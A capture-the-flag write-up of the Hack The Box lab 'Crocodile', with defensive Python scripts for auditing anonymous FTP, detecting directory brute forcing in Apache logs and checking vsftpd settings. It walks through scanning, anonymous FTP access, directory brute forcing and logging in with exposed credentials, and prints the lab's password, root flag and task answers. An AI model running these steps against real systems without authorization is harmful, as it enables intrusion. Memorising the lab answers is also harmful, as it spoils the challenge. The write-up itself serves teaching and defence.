End-to-end engagement showing service behavior, attack-path logic, and containment strategy. Reflects practical penetration testing methodology.
# Penetration Test Report: HTB Crocodile
## 1. Objective
The purpose of this engagement was to assess the security posture of the HTB Crocodile machine by identifying exposed services, enumerating available access points, and validating authentication weaknesses. This report outlines the reconnaissance process, discovered vulnerabilities, exploitation steps, and the final capture of the root flag.
---
## 2. Target Information
**Target Host:** Crocodile
**IP Address:** 10.129.184.140
**Operating System:** Ubuntu (Apache 2.4.41 detected)
**Services:** FTP, HTTP, DNS (filtered)
---
## 3. Methodology
This assessment followed a straightforward workflow:
1. Recon
2. Enumeration
3. Credential Discovery
4. Web Authentication Bypass
5. Post-Authentication Validation
All testing was performed inside the authorized HTB environment.
---
## 4. Recon and Enumeration
### 4.1 Nmap Scan
**Command:**
```bash
sudo nmap -sV -O 10.129.184.140
```
### 4.2 Scan Summary
Nmap revealed an open FTP server with anonymous login enabled and an Apache web server hosting the application.
| Port | State | Service | Version |
| ------ | -------- | ------- | ---------------------------- |
| 21/tcp | open | ftp | vsftpd 3.0.3 |
| 53/tcp | filtered | domain | unknown |
| 80/tcp | open | http | Apache httpd 2.4.41 (Ubuntu) |
The presence of anonymous FTP access is a critical finding.
---
## 5. FTP Enumeration
### Task 1
**Nmap switch that uses default scripts:**
```
-sC
```
### Task 2
**Service on port 21:**
```
vsftpd 3.0.3
```
Connect to FTP:
```bash
ftp 10.129.184.140
```
Login credentials:
```
Username: anonymous
```
### Task 3
**FTP code for successful anonymous login:**
```
230
```
### Task 4
**Anonymous login username:**
```
anonymous
```
### Task 5
**Command to download files from FTP:**
```
get
```
After logging in:
```bash
ls
```
You will find:
```
allowed.userlist
allowed.userlist.passwd
```
Download both:
```bash
get allowed.userlist
get allowed.userlist.passwd
```
### Task 6
**High-privilege-sounding username found:**
```
admin
```
These files provide usernames and passwords for later web authentication.
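The anonymous-login check above can be turned into a repeatable audit. The following is an added example, not code from the original report: it attempts an anonymous login with the standard library's `ftplib`, interprets the reply code (230 logged in, 331 password wanted, 530 refused), and, when the login succeeds, flags listing entries that look like credential material. The target host and port are arguments you supply; the file-name patterns beyond `userlist` and `passwd` are an assumption made for the example.

```python
# Added example, not part of the original report: audit a host for the anonymous
# FTP exposure described above. Standard library only; host/port are supplied by
# the caller, and the sensitive-name patterns are an assumption for this example.
import ftplib
import re
import sys
from typing import Dict, List, Tuple

# FTP reply codes from the login exchange (RFC 959)
FTP_LOGGED_IN = 230        # "User logged in, proceed": the code the report observed
FTP_NEED_PASSWORD = 331    # "User name okay, need password"
FTP_NOT_LOGGED_IN = 530    # "Not logged in": anonymous correctly refused

# Names that should never be readable anonymously. 'userlist' and 'passwd'
# match the two files found on Crocodile; the other patterns are assumed.
SENSITIVE_NAME = re.compile(r"(passwd|password|shadow|userlist|\.key$|\.pem$)", re.I)


def parse_reply(line: str) -> Tuple[int, str]:
    """Split an FTP reply such as '230 Login successful.' into (code, text)."""
    m = re.match(r"^(\d{3})[ -](.*)$", line.strip())
    if not m:
        raise ValueError(f"not an FTP reply: {line!r}")
    return int(m.group(1)), m.group(2)


def anonymous_login_allowed(reply_line: str) -> bool:
    """True when the reply to USER anonymous / PASS means the session is logged in."""
    code, _ = parse_reply(reply_line)
    return code == FTP_LOGGED_IN


def sensitive_files(listing: List[str]) -> List[str]:
    """Entries of a directory listing that look like credential material."""
    return [name for name in listing if SENSITIVE_NAME.search(name)]


def check_anonymous_ftp(host: str, port: int = 21, timeout: float = 5.0) -> Dict:
    """Live check: attempt an anonymous login; if it succeeds, list the root directory.

    Returns {'host', 'anonymous': bool, 'reply': str, 'sensitive': [names]}.
    Connection and permission errors are recorded in 'reply' rather than raised,
    so the function can run unattended across an inventory of hosts.
    """
    result: Dict = {"host": host, "anonymous": False, "reply": "", "sensitive": []}
    try:
        with ftplib.FTP() as ftp:
            ftp.connect(host, port, timeout=timeout)
            reply = ftp.login("anonymous", "anonymous@example.invalid")
            result["reply"] = reply
            result["anonymous"] = anonymous_login_allowed(reply)
            if result["anonymous"]:
                result["sensitive"] = sensitive_files(ftp.nlst())
    except ftplib.error_perm as exc:       # e.g. "530 Login incorrect."
        result["reply"] = str(exc)
    except (OSError, EOFError) as exc:      # refused, timed out, closed early
        result["reply"] = f"connection failed: {exc}"
    return result


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.129.184.140"
    report = check_anonymous_ftp(target)
    verdict = "ANONYMOUS LOGIN ALLOWED" if report["anonymous"] else "anonymous login refused"
    print(f"{report['host']}: {verdict} ({report['reply']})")
    for name in report["sensitive"]:
        print(f"  exposed: {name}")
```

Run it as `python3 ftp_audit.py <host>`; a 230 reply is the finding the report describes, a 530 reply is the expected state after anonymous access is disabled.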
---
## 6. Web Enumeration
### Task 7
**Apache version running on the host:**
```
Apache httpd 2.4.41
```
### Task 8
**Gobuster switch for filetype extension searches:**
```
-x
```
### Task 9
**PHP file discovered via directory brute force that enables login:**
Use Feroxbuster or Gobuster. Example:
```bash
feroxbuster -u http://10.129.184.140 --extensions "php,txt"
```
Important directory discovered:
```
/dashboard/
```
This redirects to:
```
login.php
```
**Answer:**
```
login.php
```
---
## 7. Exploitation
Using the credentials obtained from the FTP files:
```
username: admin
password: rKXM59ESxesUFHAd
```
Log in at:
```
http://10.129.184.140/dashboard/login.php
```
After successful authentication, the application displays the root flag.
---
## 8. Proof of Compromise
**Root Flag:**
```
c7110277ac44d78b6a9fff2232434d16
```
This confirms full access to the internal dashboard and successful compromise of the machine.
---
## 9. Recommendations
1. Disable anonymous FTP access.
2. Enforce strong authentication for file storage areas.
3. Restrict FTP exposure to trusted networks.
4. Protect the web server against directory enumeration (no directory listing) and rate-limit brute-force requests.
5. Avoid storing plaintext credentials in public directories.
6. Monitor access logs for unusual brute force attempts.
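The directory brute force in section 6 and recommendation 6 (monitor access logs) meet in the Apache access log: a wordlist sweep shows up as a burst of 404s for many distinct paths from one client. The following is an added example, not code from the original report: it parses combined-format log lines and flags any client that produces at least 20 distinct 404 paths within a 10-second window. The log lines, IPs and thresholds are constructed for the example.

```python
# Added example, not part of the original report: detect directory brute
# forcing (the feroxbuster/gobuster sweep from section 6) in an Apache
# access log, as recommendation 6 asks. All log lines below are constructed.
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Optional

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; returns None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_enumeration(lines: List[str], window_s: int = 10, threshold: int = 20) -> Dict[str, int]:
    """Flag clients that request >= threshold distinct paths returning 404 within
    any window_s-second span. Brute forcing is a burst of misses on paths nobody
    links to; an ordinary visitor with a few broken links stays below threshold.
    Returns {ip: peak number of distinct 404 paths seen in one window}.
    """
    records = [r for r in map(parse_line, lines) if r is not None and r["status"] == 404]
    records.sort(key=lambda r: r["ts"])           # merged logs may be out of order
    recent = defaultdict(deque)                   # ip -> deque of (ts, path) in window
    flagged: Dict[str, int] = {}
    for rec in records:
        q = recent[rec["ip"]]
        q.append((rec["ts"], rec["path"]))
        while (rec["ts"] - q[0][0]).total_seconds() > window_s:
            q.popleft()
        distinct = len({path for _, path in q})
        if distinct >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), distinct)
    return flagged


def build_sample_log() -> List[str]:
    """Constructed sample: one scanner sweeping 30 guessed paths in 5 seconds,
    one ordinary visitor hitting the real dashboard plus two broken links."""
    scanner, visitor = "203.0.113.7", "198.51.100.4"
    lines = [
        f'{scanner} - - [10/Jan/2024:12:00:{i // 6:02d} +0000] '
        f'"GET /guess{i}.php HTTP/1.1" 404 196 "-" "scanner-ua (constructed)"'
        for i in range(30)
    ]
    lines += [
        f'{visitor} - - [10/Jan/2024:12:00:01 +0000] "GET /dashboard/ HTTP/1.1" 302 - "-" "Mozilla/5.0"',
        f'{visitor} - - [10/Jan/2024:12:00:03 +0000] "GET /old.html HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
        f'{visitor} - - [10/Jan/2024:12:00:09 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    ]
    return lines


if __name__ == "__main__":
    for ip, peak in find_enumeration(build_sample_log()).items():
        print(f"{ip}: {peak} distinct 404 paths within 10 s, likely directory brute force")
```

Keying on distinct 404 paths rather than on the scanner's User-Agent is deliberate: the agent string is trivially changed, while a wordlist sweep cannot avoid producing misses. Tune `threshold` and `window_s` against your own baseline of 404s per client before alerting on production logs.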
---
## 10. Conclusion
The Crocodile machine was compromised through a combination of anonymous FTP access and exposed credential files. These credentials allowed direct authentication into the dashboard application, leading to retrieval of the root flag. Proper access control and secure credential handling would prevent this attack path.
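Recommendations 1 to 3 map onto a handful of vsftpd directives. The following is an added example, not code or configuration from the original report or from the vsftpd project: it parses a `vsftpd.conf`, applies vsftpd's documented defaults for absent directives (notably that `anonymous_enable` defaults to YES when the line is missing), and reports findings for a constructed weak configuration beside a constructed hardened one. The two configuration texts and the finding codes are assumptions made for the example.

```python
# Added example, not part of the original report: audit a vsftpd.conf for the
# settings behind recommendations 1-3. The two config texts are constructed;
# directive names and defaults are vsftpd's documented ones.
from typing import Dict, List, Tuple

# Documented vsftpd defaults when a directive is absent. anonymous_enable
# defaults to YES in vsftpd itself, so a missing line is a finding, not a pass
# (distribution packages ship a vsftpd.conf that sets it to NO explicitly).
DEFAULTS = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "local_enable": "NO",
    "write_enable": "NO",
    "ssl_enable": "NO",
}

WEAK_CONF = """\
# constructed: the kind of setup that exposes a credential file to anyone
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
"""

HARDENED_CONF = """\
# constructed: anonymous off, bound to one interface, credentials only over TLS
listen=YES
listen_address=10.0.0.5
anonymous_enable=NO
local_enable=YES
write_enable=NO
ssl_enable=YES
force_local_logins_ssl=YES
"""


def parse_vsftpd_conf(text: str) -> Dict[str, str]:
    """vsftpd.conf is one 'key=value' per line; '#' lines and blanks are ignored,
    and a repeated key takes its last value."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def audit(conf: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (code, message) findings; an empty list means every check passed."""
    def on(key: str) -> bool:
        return conf.get(key, DEFAULTS.get(key, "NO")).upper() == "YES"

    findings: List[Tuple[str, str]] = []
    if on("anonymous_enable"):
        findings.append(("ANON_LOGIN",
                         "anonymous_enable is YES or unset: anyone can log in as 'anonymous' (rec. 1)"))
        if on("write_enable") and (on("anon_upload_enable") or on("anon_mkdir_write_enable")):
            findings.append(("ANON_WRITE",
                             "anonymous users can upload files or create directories (rec. 2)"))
    if on("local_enable") and not on("ssl_enable"):
        findings.append(("NO_TLS",
                         "local users log in without ssl_enable: passwords cross the network in clear (rec. 2)"))
    if "listen_address" not in conf:
        findings.append(("ALL_INTERFACES",
                         "no listen_address: the daemon binds every interface, not only trusted ones (rec. 3)"))
    return findings


def codes(findings: List[Tuple[str, str]]) -> List[str]:
    """Just the finding codes, convenient for comparing two configurations."""
    return [code for code, _ in findings]


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for code, msg in audit(parse_vsftpd_conf(text)) or [("OK", "no findings")]:
            print(f"  {code}: {msg}")
```

The `listen_address` check is a coarse stand-in for recommendation 3; in practice the network restriction belongs in the host firewall or security group as well, since binding to one interface does nothing if that interface is the public one.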
---